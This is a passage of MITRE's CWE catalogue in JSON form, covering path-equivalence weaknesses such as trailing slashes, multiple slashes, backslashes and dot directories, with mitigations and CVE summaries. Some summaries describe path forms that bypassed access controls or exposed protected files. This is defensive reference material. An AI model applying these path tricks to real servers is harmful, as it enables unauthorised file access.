\'filedir \'","attr":{"@_Date":"2008-04-11"}}}},"47":{"attr":{"@_ID":"47","@_Name":"Path Equivalence: \' filename\' (Leading Space)","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"A software system that accepts path input in the form of leading space (\' filedir\') without appropriate validation can lead to ambiguous path resolution and allow an attacker to traverse the file system to unintended locations or access arbitrary files.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"41","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Common_Consequences":{"Consequence":{"Scope":["Confidentiality","Integrity"],"Impact":["Read Files or Directories","Modify Files or Directories"]}},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Leading Space - \' filedir\'"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP16","Entry_Name":"Path Traversal"}]},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"}],"Previous_Entry_Name":[{"#text":"Path Issue - Leading Space - \' filedir\'","attr":{"@_Date":"2008-04-11"}},{"#text":"Path Equivalence: \' filename (Leading Space)","attr":{"@_Date":"2010-09-27"}}]}},"48":{"attr":{"@_ID":"48","@_Name":"Path Equivalence: \'file name\' (Internal Whitespace)","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"A software system that accepts path input in the form of internal space (\'file(SPACE)name\') without appropriate validation can lead to ambiguous path resolution and allow an attacker to traverse the file system to unintended locations or access arbitrary files.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"41","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Common_Consequences":{"Consequence":{"Scope":["Confidentiality","Integrity"],"Impact":["Read Files or Directories","Modify Files or Directories"]}},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2000-0293","Description":"Filenames with spaces allow arbitrary file deletion when the product does not properly quote them; some overlap with path traversal.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0293"},{"Reference":"CVE-2001-1567","Description":"\\"+\\" characters in query string converted to spaces before sensitive file/extension (internal space), leading to bypass of access restrictions to the file.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-1567"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"file(SPACE)name (internal space)"},{"attr":{"@_Taxonomy_Name":"OWASP Top Ten 2004"},"Entry_ID":"A9","Entry_Name":"Denial of Service","Mapping_Fit":"CWE More Specific"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP16","Entry_Name":"Path Traversal"}]},"Notes":{"Note":[{"#text":"This weakness is likely to overlap quoting problems, e.g. the \\"Program Files\\" unquoted search path (CWE-428). It also could be an equivalence issue if filtering removes all extraneous spaces.","attr":{"@_Type":"Relationship"}},{"#text":"Whitespace can be a factor in other weaknesses not directly related to equivalence. It can also be used to spoof icons or hide files with dangerous names (see icon manipulation and visual truncation in CWE-451).","attr":{"@_Type":"Relationship"}}]},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Other_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-06-23","Modification_Comment":"updated Applicable_Platforms, Other_Notes, Relationship_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"}],"Previous_Entry_Name":{"#text":"Path Issue - Internal Space - file(SPACE)name","attr":{"@_Date":"2008-04-11"}}}},"49":{"attr":{"@_ID":"49","@_Name":"Path Equivalence: \'filename/\' (Trailing Slash)","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"A software system that accepts path input in the form of trailing slash (\'filedir/\') without appropriate validation can lead to ambiguous path resolution and allow an attacker to traverse the file system to unintended locations or access arbitrary files.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"41","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"162","@_View_ID":"1000"}}]},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Implementation"},{"Phase":"Operation"}]},"Common_Consequences":{"Consequence":{"Scope":["Confidentiality","Integrity"],"Impact":["Read Files or Directories","Modify Files or Directories"]}},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2002-0253","Description":"Overlaps infoleak","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0253"},{"Reference":"CVE-2001-0446","Description":"Application server allows remote attackers to read source code for .jsp files by appending a / to the requested URL.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0446"},{"Reference":"CVE-2004-0334","Description":"Bypass Basic Authentication for files using trailing \\"/\\"","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0334"},{"Reference":"CVE-2001-0893","Description":"Read sensitive files with trailing \\"/\\"","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0893"},{"Reference":"CVE-2001-0892","Description":"Web server allows remote attackers to view sensitive files under the document root (such as .htpasswd) via a GET request with a trailing /.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0892"},{"Reference":"CVE-2004-1814","Description":"Directory traversal vulnerability in server allows remote attackers to read protected files via .. (dot dot) sequences in an HTTP request.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-1814"},{"Reference":"BID:3518","Description":"Source code disclosure","Link":"http://www.securityfocus.com/bid/3518"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"filedir/ (trailing slash, trailing /)"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP16","Entry_Name":"Path Traversal"}]},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-11-24","Modification_Comment":"updated Observed_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-12-13","Modification_Comment":"updated Observed_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Observed_Examples, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"}],"Previous_Entry_Name":{"#text":"Path Issue - Trailing Slash - filedir/","attr":{"@_Date":"2008-04-11"}}}},"50":{"attr":{"@_ID":"50","@_Name":"Path Equivalence: \'//multiple/leading/slash\'","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"A software system that accepts path input in the form of multiple leading slash (\'//multiple/leading/slash\') without appropriate validation can lead to ambiguous path resolution and allow an attacker to traverse the file system to unintended locations or access arbitrary files.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"41","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"161","@_View_ID":"1000"}}]},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Common_Consequences":{"Consequence":{"Scope":["Confidentiality","Integrity"],"Impact":["Read Files or Directories","Modify Files or Directories"]}},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2002-1483","Description":"Read files with full pathname using multiple internal slash.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1483"},{"Reference":"CVE-1999-1456","Description":"Server allows remote attackers to read arbitrary files via a GET request with more than one leading / (slash) character in the filename.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-1456"},{"Reference":"CVE-2004-0578","Description":"Server allows remote attackers to read arbitrary files via leading slash (//) characters in a URL request.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0578"},{"Reference":"CVE-2002-0275","Description":"Server allows remote attackers to bypass authentication and read restricted files via an extra / (slash) in the requested URL.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0275"},{"Reference":"CVE-2004-1032","Description":"Product allows local users to delete arbitrary files or create arbitrary empty files via a target filename with a large number of leading slash (/) characters.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-1032"},{"Reference":"CVE-2002-1238","Description":"Server allows remote attackers to bypass access restrictions for files via an HTTP request with a sequence of multiple / (slash) characters such as http://www.example.com///file/.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1238"},{"Reference":"CVE-2004-1878","Description":"Product allows remote attackers to bypass authentication, obtain sensitive information, or gain access via a direct request to admin/user.pl preceded by // (double leading slash).","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-1878"},{"Reference":"CVE-2005-1365","Description":"Server allows remote attackers to execute arbitrary commands via a URL with multiple leading \\"/\\" (slash) characters and \\"..\\" sequences.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1365"},{"Reference":"CVE-2000-1050","Description":"Access directory using multiple leading slash.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-1050"},{"Reference":"CVE-2001-1072","Description":"Bypass access restrictions via multiple leading slash, which causes a regular expression to fail.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-1072"},{"Reference":"CVE-2004-0235","Description":"Archive extracts to arbitrary files using multiple leading slash in filenames in the archive.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0235"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"//multiple/leading/slash (\'multiple leading slash\')"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP16","Entry_Name":"Path Traversal"}]},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Observed_Examples, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"}],"Previous_Entry_Name":{"#text":"Path Issue - Multiple Leading Slash - //multiple/leading/slash","attr":{"@_Date":"2008-04-11"}}}},"51":{"attr":{"@_ID":"51","@_Name":"Path Equivalence: \'/multiple//internal/slash\'","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"A software system that accepts path input in the form of multiple internal slash (\'/multiple//internal/slash/\') without appropriate validation can lead to ambiguous path resolution and allow an attacker to traverse the file system to unintended locations or access arbitrary files.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"41","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Common_Consequences":{"Consequence":{"Scope":["Confidentiality","Integrity"],"Impact":["Read Files or Directories","Modify Files or Directories"]}},"Potential_Mitigations":{"Mitigation":{"attr":{"@_Mitigation_ID":"MIT-20"},"Phase":"Implementation","Strategy":"Input Validation","Description":"Inputs should be decoded and canonicalized to the application\'s current internal representation before being validated (CWE-180). Make sure that the application does not decode the same input twice (CWE-174). Such errors could be used to bypass allowlist validation schemes by introducing dangerous inputs after they have been checked."}},"Observed_Examples":{"Observed_Example":{"Reference":"CVE-2002-1483","Description":"Read files with full pathname using multiple internal slash.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1483"}},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"/multiple//internal/slash (\'multiple internal slash\')"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP16","Entry_Name":"Path Traversal"}]},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-06-25","Modification_Comment":"updated Potential_Mitigations"}],"Previous_Entry_Name":{"#text":"Path Issue - Multiple Internal Slash - /multiple//internal/slash","attr":{"@_Date":"2008-04-11"}}}},"52":{"attr":{"@_ID":"52","@_Name":"Path Equivalence: \'/multiple/trailing/slash//\'","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"A software system that accepts path input in the form of multiple trailing slash (\'/multiple/trailing/slash//\') without appropriate validation can lead to ambiguous path resolution and allow an attacker to traverse the file system to unintended locations or access arbitrary files.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"41","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"163","@_View_ID":"1000"}},{"attr":{"@_Nature":"CanPrecede","@_CWE_ID":"289","@_View_ID":"1000"}}]},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Common_Consequences":{"Consequence":{"Scope":["Confidentiality","Integrity"],"Impact":["Read Files or Directories","Modify Files or Directories"]}},"Potential_Mitigations":{"Mitigation":{"attr":{"@_Mitigation_ID":"MIT-20"},"Phase":"Implementation","Strategy":"Input Validation","Description":"Inputs should be decoded and canonicalized to the application\'s current internal representation before being validated (CWE-180). Make sure that the application does not decode the same input twice (CWE-174). Such errors could be used to bypass allowlist validation schemes by introducing dangerous inputs after they have been checked."}},"Observed_Examples":{"Observed_Example":{"Reference":"CVE-2002-1078","Description":"Directory listings in web server using multiple trailing slash","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1078"}},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"/multiple/trailing/slash// (\'multiple trailing slash\')"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP16","Entry_Name":"Path Traversal"}]},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-06-25","Modification_Comment":"updated Potential_Mitigations"}],"Previous_Entry_Name":{"#text":"Path Issue - Multiple Trailing Slash - /multiple/trailing/slash//","attr":{"@_Date":"2008-04-11"}}}},"53":{"attr":{"@_ID":"53","@_Name":"Path Equivalence: \'\\\\multiple\\\\\\\\internal\\\\backslash\'","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"A software system that accepts path input in the form of multiple internal backslash (\'\\\\multiple\\\\trailing\\\\\\\\slash\') without appropriate validation can lead to ambiguous path resolution and allow an attacker to traverse the file system to unintended locations or access arbitrary files.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"41","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"165","@_View_ID":"1000"}}]},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Common_Consequences":{"Consequence":{"Scope":["Confidentiality","Integrity"],"Impact":["Read Files or Directories","Modify Files or Directories"]}},"Potential_Mitigations":{"Mitigation":{"attr":{"@_Mitigation_ID":"MIT-20"},"Phase":"Implementation","Strategy":"Input Validation","Description":"Inputs should be decoded and canonicalized to the application\'s current internal representation before being validated (CWE-180). Make sure that the application does not decode the same input twice (CWE-174). Such errors could be used to bypass allowlist validation schemes by introducing dangerous inputs after they have been checked."}},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"\\\\multiple\\\\\\\\internal\\\\backslash"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP16","Entry_Name":"Path Traversal"}]},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-06-25","Modification_Comment":"updated Potential_Mitigations"}],"Previous_Entry_Name":{"#text":"Path Issue - Multiple Internal Backslash - \\\\multiple\\\\\\\\internal\\\\backslash","attr":{"@_Date":"2008-04-11"}}}},"54":{"attr":{"@_ID":"54","@_Name":"Path Equivalence: \'filedir\\\\\' (Trailing Backslash)","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"A software system that accepts path input in the form of trailing backslash (\'filedir\\\\\') without appropriate validation can lead to ambiguous path resolution and allow an attacker to traverse the file system to unintended locations or access arbitrary files.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"41","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"162","@_View_ID":"1000"}}]},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Common_Consequences":{"Consequence":{"Scope":["Confidentiality","Integrity"],"Impact":["Read Files or Directories","Modify Files or Directories"]}},"Potential_Mitigations":{"Mitigation":{"attr":{"@_Mitigation_ID":"MIT-20"},"Phase":"Implementation","Strategy":"Input Validation","Description":"Inputs should be decoded and canonicalized to the application\'s current internal representation before being validated (CWE-180). Make sure that the application does not decode the same input twice (CWE-174). Such errors could be used to bypass allowlist validation schemes by introducing dangerous inputs after they have been checked."}},"Observed_Examples":{"Observed_Example":{"Reference":"CVE-2004-0847","Description":"ASP.NET allows remote attackers to bypass authentication for .aspx files in restricted directories via a request containing a (1) \\"\\\\\\" (backslash) or (2) \\"%5C\\" (encoded backslash), aka \\"Path Validation Vulnerability.\\"","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0847"}},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"filedir\\\\ (trailing backslash)"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP16","Entry_Name":"Path Traversal"}]},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Observed_Examples, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-06-25","Modification_Comment":"updated Potential_Mitigations"}],"Previous_Entry_Name":{"#text":"Path Issue - Trailing Backslash - (filedir\\\\)","attr":{"@_Date":"2008-04-11"}}}},"55":{"attr":{"@_ID":"55","@_Name":"Path Equivalence: \'/./\' (Single Dot Directory)","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"A software system that accepts path input in the form of single dot directory exploit (\'/./\') without appropriate validation can lead to ambiguous path resolution and allow an attacker to traverse the file system to unintended locations or access arbitrary files.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"41","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Common_Consequences":{"Consequence":{"Scope":["Confidentiality","Integrity"],"Impact":["Read Files or Directories","Modify Files or Directories"]}},"Potential_Mitigations":{"Mitigation":{"attr":{"@_Mitigation_ID":"MIT-20"},"Phase":"Implementation","Strategy":"Input Validation","Description":"Inputs should be decoded and canonicalized to the application\'s current internal representation before being validated (CWE-180). Make sure that the application does not decode the same input twice (CWE-174). Such errors could be used to bypass allowlist validation schemes by introducing dangerous inputs after they have been checked."}},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2000-0004","Description":"Server allows remote attackers to read source code for executable files by inserting a . (dot) into the URL.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0004"},{"Reference":"CVE-2002-0304","Description":"Server allows remote attackers to read password-protected files via a /./ in the HTTP request.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0304"},{"Reference":"BID:6042","Description":"Input Validation error","Link":"http://www.securityfocus.com/bid/6042"},{"Reference":"CVE-1999-1083","Description":"Possibly (could be a cleansing error)","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-1083"},{"Reference":"CVE-2004-0815","Description":"\\"/./////etc\\" cleansed to \\".///etc\\" then 